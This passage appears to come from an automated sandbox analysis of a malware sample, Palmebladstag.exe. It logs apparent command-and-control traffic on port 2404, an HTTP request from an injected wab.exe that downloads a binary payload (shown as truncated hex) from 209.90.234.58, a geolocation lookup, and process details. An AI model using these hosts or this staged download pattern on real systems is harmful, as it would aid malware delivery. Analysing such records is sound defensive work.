                                          May 10, 2024 14:22:40.830770969 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.830796957 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.833127975 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.833143950 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.833156109 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.833172083 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.833188057 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.833190918 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.833205938 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.833218098 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.833223104 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.833230972 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.833246946 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.833249092 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.833261967 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.833276033 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.833287954 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.833292007 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.833302975 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.833314896 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.833332062 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.835114956 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.835139990 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.835155010 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.835160971 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.835170984 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.835187912 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.835273981 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.835288048 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.835299969 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.835308075 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.835313082 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.835325956 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.835339069 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.835347891 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.835355043 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.835367918 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.835369110 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.835383892 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.835392952 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.835426092 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.837960958 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.838026047 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.838037968 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.838049889 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.838066101 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.838067055 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.838082075 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.838083029 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.838095903 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.838109970 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.838119984 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.838124990 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.838139057 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.838151932 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.838164091 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.838170052 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.838177919 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.838186979 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.838207006 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.840085983 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.840106964 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.840118885 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.840132952 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.840133905 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.840147018 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.840162039 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.840177059 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.840183020 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.840190887 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.840195894 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.840204954 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.840218067 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.840220928 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.840234995 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.840245008 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.840248108 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.840261936 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.840281010 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.840301991 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.842447042 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.842461109 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.842473030 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.842489958 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.842504025 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.842506886 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.842515945 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.842530966 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.842544079 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.842544079 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.842555046 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.842561007 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.842573881 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.842586040 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.842586040 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.842597008 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.842609882 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.842624903 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.842638016 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.844615936 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.844630957 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.844645023 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.844655991 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.844677925 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.844728947 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.844742060 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.844754934 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.844768047 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.844779968 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.844782114 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.844798088 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.844810009 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.844818115 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.844832897 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.844842911 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.844846964 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.844858885 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.844882011 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.844896078 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.847090960 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.847160101 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.847172022 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.847187996 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.847199917 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.847206116 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.847220898 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.847234964 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.847234964 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.847249031 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.847268105 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.847275972 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.847280979 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.847295046 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.847307920 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.847320080 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.847332001 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.847340107 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.847362995 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.854099035 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.995485067 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.995507956 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.995523930 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.995538950 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.995552063 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.995564938 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.995577097 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.995579004 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.995589018 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.995603085 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.995613098 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.995615959 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.995629072 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.995630980 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.995645046 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.995657921 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.995661020 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.995681047 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.996627092 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.996643066 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.996658087 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.996665001 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:40.996670961 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:40.996706009 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:43.055270910 CEST240449724172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:43.058446884 CEST497242404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:43.273340940 CEST240449724172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:43.312956095 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:43.475420952 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:43.475438118 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:43.475480080 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:43.475526094 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:22:43.637639999 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:43.658212900 CEST240449725172.93.222.147192.168.2.6
                                          May 10, 2024 14:22:43.658375025 CEST497252404192.168.2.6172.93.222.147
                                          May 10, 2024 14:23:13.081202030 CEST240449724172.93.222.147192.168.2.6
                                          May 10, 2024 14:23:13.134059906 CEST497242404192.168.2.6172.93.222.147
                                          May 10, 2024 14:23:13.351676941 CEST497242404192.168.2.6172.93.222.147
                                          May 10, 2024 14:23:13.564421892 CEST240449724172.93.222.147192.168.2.6
                                          TimestampSource PortDest PortSource IPDest IP
                                          May 10, 2024 14:22:39.078054905 CEST6409753192.168.2.61.1.1.1
                                          May 10, 2024 14:22:39.188348055 CEST53640971.1.1.1192.168.2.6
                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          May 10, 2024 14:22:39.078054905 CEST192.168.2.61.1.1.10xa684Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          May 10, 2024 14:22:39.188348055 CEST1.1.1.1192.168.2.60xa684No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                          • 209.90.234.58
                                          • geoplugin.net
                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.649723209.90.234.58806820C:\Program Files (x86)\Windows Mail\wab.exe
                                          TimestampBytes transferredDirectionData
                                          May 10, 2024 14:22:35.911897898 CEST170OUTGET /fGuGZ105.bin HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                          Host: 209.90.234.58
                                          Cache-Control: no-cache
                                          May 10, 2024 14:22:36.066284895 CEST1289INHTTP/1.1 200 OK
                                          Content-Type: application/octet-stream
                                          Last-Modified: Thu, 09 May 2024 05:36:30 GMT
                                          Accept-Ranges: bytes
                                          ETag: "1b2198d8d2a1da1:0"
                                          Server: Microsoft-IIS/10.0
                                          Date: Fri, 10 May 2024 12:22:35 GMT
                                          Content-Length: 494656
                                          Data Raw: 98 5d ff 23 66 54 65 7b 5b 9b 78 5e 83 3b 42 1d 3d 56 65 cf 1f ee 22 e9 c0 25 0c 73 ea 41 94 f9 fa 0a f8 e6 de 3d e3 57 b6 ca 69 1c 41 06 3e e2 56 41 26 78 e5 b7 de bc 2a c9 41 92 b9 4d c5 78 6e a3 99 29 bd 65 a9 49 79 68 eb 4e e8 f4 20 1c 59 fb 04 6f 31 52 40 22 26 54 0d 82 07 41 94 2e b4 45 f7 4d 56 70 99 02 46 e8 cd 12 ad ac f1 3e f1 07 c3 b1 8b 35 cc c1 a8 69 c4 de 58 ac 58 ea a9 6a 2a 5c d1 44 0c 19 3f e9 d3 47 f0 63 cc 98 ba 53 31 0d a1 b0 68 9b e8 f0 39 fa f3 fc 10 75 a8 c2 8d df 4b eb 33 05 43 02 f7 4c cd 2d 83 32 da 0a 00 a1 61 5f c9 44 9b 25 12 95 40 35 d6 28 d6 a9 32 1d 72 ad c2 7c 56 b0 b3 a6 f5 1b e0 78 d2 31 e8 36 51 b3 a8 16 2a 8a f2 92 a4 06 d3 ed 80 c8 51 76 7b f4 aa c4 cd 30 b4 ec 93 50 e0 14 47 94 13 5b 85 cd 4d 23 ee 47 c8 d9 0d 56 81 61 b6 e9 8c fd 43 ef b3 f5 dc 49 35 c7 c3 5b 54 af 08 47 3f f4 5c ed 8b a4 f0 9c cf 2c a6 d3 16 22 7f 24 f0 c5 35 81 4f 4e 7c 9e b9 0d b5 97 8d 88 cd 14 70 76 46 ee 02 4b af 83 c0 28 5a 39 09 c9 05 f4 4d a9 5d df 02 22 85 67 ac 0f 73 0d 95 96 56 3b [TRUNCATED]
                                          Data Ascii: ]#fTe{[x^;B=Ve"%sA=WiA>VA&x*AMxn)eIyhN Yo1R@"&TA.EMVpF>5iXXj*\D?GcS1h9uK3CL-2a_D%@5(2r|Vx16Q*Qv{0PG[M#GVaCI5[TG?\,"$5ON|pvFK(Z9M]"gsV;R;R9m).%=Ym+)PDJK7Ds'HfijmO%^B\D8bu@jfuxHy^Kvsl;mv3S4fzDiEc?q>7`$b5<bP~C:dA2`TZ&aG%|\kdPEgdw~d)k+!]V^TZ_\q!BgWPzA^8`+7ur+7`Hw4nhRHyj`|cLPC|:~D($\DuW`:lDq9U2/ww;^$F;9/<J80~}%QlDJBKXmdo] `=Fj9fZi?<GSjLl7NyE3hK3V&[@u/Z(2h`t-ld7'5>O--Kq_'U)vi^.oHaG%<".$Y-]=fN [TRUNCATED]
                                          May 10, 2024 14:22:36.066307068 CEST1289INData Raw: db 1d f2 53 28 ca 7c 2a de d6 7e 4f f0 78 14 7a 09 4a b8 c7 33 52 71 7a e7 e1 a9 97 2b 0a 5e cc c0 80 9c 41 08 ad 05 89 14 da b9 ba 06 99 a6 ab 4c 31 6e f0 9f 67 33 35 33 bc a1 3e 73 e4 5a ee bc 7f dc a8 49 bf 05 72 31 12 a1 5f b9 03 45 1a 02 c4
                                          Data Ascii: S(|*~OxzJ3Rqz+^AL1ng353>sZIr1_E=VjTML;b@Q4MEK9m4Bjnp@>Lf>\;l&9 [eO%\~U+DbbPcjw+Zju[1=>O
                                          May 10, 2024 14:22:36.066324949 CEST1289INData Raw: eb c5 3c 5a df 31 9c 57 82 3a 3d a3 3b db d6 04 41 6d 8a 02 61 c2 b8 d5 00 cc 5c 6d d5 b3 dc fd 54 d8 7a 86 48 d2 89 25 e7 82 4d 55 32 e9 05 e9 4a 63 8d 97 49 fd fb a1 ca 3c 71 4d 70 87 e7 80 94 8b 05 c5 b5 27 b6 bf 58 bd 94 62 b8 d7 59 ae 45 b5
                                          Data Ascii: <Z1W:=;Ama\mTzH%MU2JcI<qMp'XbYEAyM<]V)RmY&|ZS7h'-bK\UH~2L(`S,glf.\%9xG)K,OLvYoe
                                          May 10, 2024 14:22:36.066346884 CEST1289INData Raw: 8f c9 5a ae 8b 34 ac 9a b9 ef 9c 59 c3 9a 23 a8 f6 31 fc 11 b1 18 47 c9 17 af e2 ad 18 6f 4e 0c e5 40 45 83 c8 11 b7 bc 9e de 60 c9 08 c6 68 ac 5b 84 8b a2 cf 07 dd fa 2d 42 d9 ef 19 a3 77 06 81 4b 34 1e 7e cd 02 28 41 36 85 71 7a 84 02 4d 46 3b
                                          Data Ascii: Z4Y#1GoN@E`h[-BwK4~(A6qzMF;R:`xDS2)3?TK7!~NMk\pJv 7AYYUn7w-^._Zf5xt,9m8:X'-eIS/'b6QW#mJX4F(
                                          May 10, 2024 14:22:36.066360950 CEST1289INData Raw: d2 ea 93 37 8b 1d a3 6d ce b1 19 c3 3a aa cf 18 a7 8b 34 f7 75 79 98 6d 9d 98 d9 2b ff c7 7f a6 4e 8f db 3c 33 0d af d8 0c 51 2b 16 8b 2f 17 57 4c af 34 4d f0 d9 3b ad e1 5b 68 55 08 ec de 30 5a 75 ae cb 0c 2c 0f f0 61 23 4c ad 0a e9 f0 07 37 66
                                          Data Ascii: 7m:4uym+N<3Q+/WL4M;[hU0Zu,a#L7fEI]z?A9bPFxHCx!F2lO1!Db>L&EF~P?zA5'>yiC@:8{En.;2$AJAD5qN>6\
                                          May 10, 2024 14:22:36.066374063 CEST1289INData Raw: f5 31 30 83 f8 78 0b 3b 8c 92 c9 a1 50 32 c7 a6 68 10 96 88 25 0e 78 77 7c cf 8c 46 24 55 64 58 b9 7f c7 d3 a0 ff e9 dd 96 7d c1 57 5a b9 c5 04 d7 71 99 9f 66 0f 30 50 72 07 65 5d 36 21 75 a4 1b d0 ea ac c9 00 24 cb f9 fa d0 8e e0 55 bf 60 2b 0d
                                          Data Ascii: 10x;P2h%xw|F$UdX}WZqf0Pre]6!u$U`+#oz#ZC w r]3F2Tzj>gKsMj~V39vi5z3N2/w#7V tVi[[|a/sU]~}ZLwUnJP
                                          May 10, 2024 14:22:36.066385984 CEST1289INData Raw: 93 5d 86 32 68 a7 5a e0 d2 31 8f e0 42 c5 16 f8 e9 c6 1f aa ed 34 18 e5 62 dd 8c 81 43 a5 db 1c 23 e1 93 1d 2f 11 40 cd 50 99 e2 66 2a ba 9a 1c 5b b8 af 1e 2e f8 ca eb 23 9e 19 22 57 a2 4f 59 54 90 64 1a 15 29 f9 e5 75 37 15 92 d6 72 50 90 9e 6f
                                          Data Ascii: ]2hZ1B4bC#/@Pf*[.#"WOYTd)u7rPor0",>"1U2Z`G-+=%x)[Ygyj,jmRu1Kn;R!+d=n2WDWHyR>,wZd%
                                          May 10, 2024 14:22:36.066400051 CEST1289INData Raw: 12 be 76 1e 08 1f 1d 0c 5b a1 d5 4f 0e b3 40 cc 47 64 4b a2 30 c6 d9 f0 a9 1a cb c7 a5 d6 77 c6 ff eb be 74 37 09 83 7a 21 9f d6 b4 cd 7a 2b 64 44 c9 d6 c0 6b 1a 05 cf 00 a4 6d a6 1c c5 f1 01 cc fc 9e 7f 1c ce d3 6a c7 62 79 93 be 22 72 57 fb f7
                                          Data Ascii: v[O@GdK0wt7z!z+dDkmjby"rW!L#mhVwV+2&+PFLu:@Z0Ly)29vqB[EdACOLjbQ!A*q"@;wAaG^ :j-/%<Bm_h
                                          May 10, 2024 14:22:36.066411018 CEST1289INData Raw: 0e d9 6c 46 4c 29 16 29 57 c8 6f 9f e7 2d 68 76 21 f5 db 01 7c 39 42 f2 a4 39 c7 8e 4a 2c b7 a9 76 64 a2 b0 28 b6 25 e7 0d 8b 45 06 58 1d dc ae 91 eb 4b 70 22 93 14 5a 7c 31 2e d9 80 66 e2 29 48 a4 66 03 d0 30 2f fc b1 39 00 de c0 98 84 24 fa 16
                                          Data Ascii: lFL))Wo-hv!|9B9J,vd(%EXKp"Z|1.f)Hf0/9$+O/%|C8:~w,WqwQ@EmD*y"(l^hjs7q8\H;g#ro+1;6R&[ez0_D*C\SI5"
                                          May 10, 2024 14:22:36.066425085 CEST1289INData Raw: e7 ba 83 69 76 fb 57 ea 5a 02 32 ed ae e8 d5 22 a1 ef 1d 6c 74 ca 4f 05 a4 e2 0a 8b a0 b7 a9 15 58 2a 1b 94 8c ae 5e 16 0e 51 59 c5 d5 17 68 0f 2c ec 42 2b 84 b5 0f 62 78 75 35 69 6d 6d f5 46 f8 fa 64 f6 4f 8d 15 83 7d 9b 66 93 76 16 f4 0e 3c 29
                                          Data Ascii: ivWZ2"ltOX*^QYh,B+bxu5immFdO}fv<)@@[>3v~s/lHDi+1`K>L)_11_g[hNEPjQt)<Dx%GiVY+rmjl#Z[C0\WyU@ RS+
                                          May 10, 2024 14:22:36.220515013 CEST1289INData Raw: b6 2c d1 60 c1 65 53 1f a9 f1 22 72 8a d0 3b 3e 29 90 ff 40 4c 77 f3 e8 6e 77 ac d0 0a b3 41 5e 7b 20 d5 c4 98 4e 34 8c 30 bd 9c de c8 a0 f3 e1 4a ee b5 92 74 31 89 e6 eb 5d 0f e6 5d 28 18 b0 38 e0 21 d2 fc 06 46 2f 7d 8b 73 a8 96 2a a1 0b bc fe
                                          Data Ascii: ,`eS"r;>)@LwnwA^{ N40Jt1]](8!F/}s*@)MO:bn,V wZU5>ElzMuv|JRd"l`I2/h~}A;L7s[:-JjsatMJwP.Zz e'.8<iG!@[Bv${A


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.649726178.237.33.50806820C:\Program Files (x86)\Windows Mail\wab.exe
                                          TimestampBytes transferredDirectionData
                                          May 10, 2024 14:22:39.452761889 CEST71OUTGET /json.gp HTTP/1.1
                                          Host: geoplugin.net
                                          Cache-Control: no-cache
                                          May 10, 2024 14:22:39.665486097 CEST1139INHTTP/1.1 200 OK
                                          date: Fri, 10 May 2024 12:22:39 GMT
                                          server: Apache
                                          content-length: 931
                                          content-type: application/json; charset=utf-8
                                          cache-control: public, max-age=300
                                          access-control-allow-origin: *
                                          Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 31 2e 31 38 31 2e 36 32 2e 33 34 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 36 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f [TRUNCATED]
                                          Data Ascii: { "geoplugin_request":"81.181.62.34", "geoplugin_status":206, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"", "geoplugin_region":"", "geoplugin_regionCode":"", "geoplugin_regionName":"", "geoplugin_areaCode":"", "geoplugin_dmaCode":"", "geoplugin_countryCode":"CH", "geoplugin_countryName":"Switzerland", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"EU", "geoplugin_continentName":"Europe", "geoplugin_latitude":"47.1449", "geoplugin_longitude":"8.1551", "geoplugin_locationAccuracyRadius":"1000", "geoplugin_timezone":"Europe\/Zurich", "geoplugin_currencyCode":"CHF", "geoplugin_currencySymbol":"CHF", "geoplugin_currencySymbol_UTF8":"CHF", "geoplugin_currencyConverter":0.9067}


                                          Click to jump to process

                                          Click to jump to process

                                          Click to dive into process behavior distribution

                                          Click to jump to process

                                          Target ID:0
                                          Start time:14:21:06
                                          Start date:10/05/2024
                                          Path:C:\Users\user\Desktop\Palmebladstag.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\Palmebladstag.exe"
                                          Imagebase:0x400000
                                          File size:514'223 bytes
                                          MD5 hash:00BA7C7288A2F5DFA4D5830C4F4D2136
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          Target ID:2
                                          Start time:14:21:07
                                          Start date:10/05/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
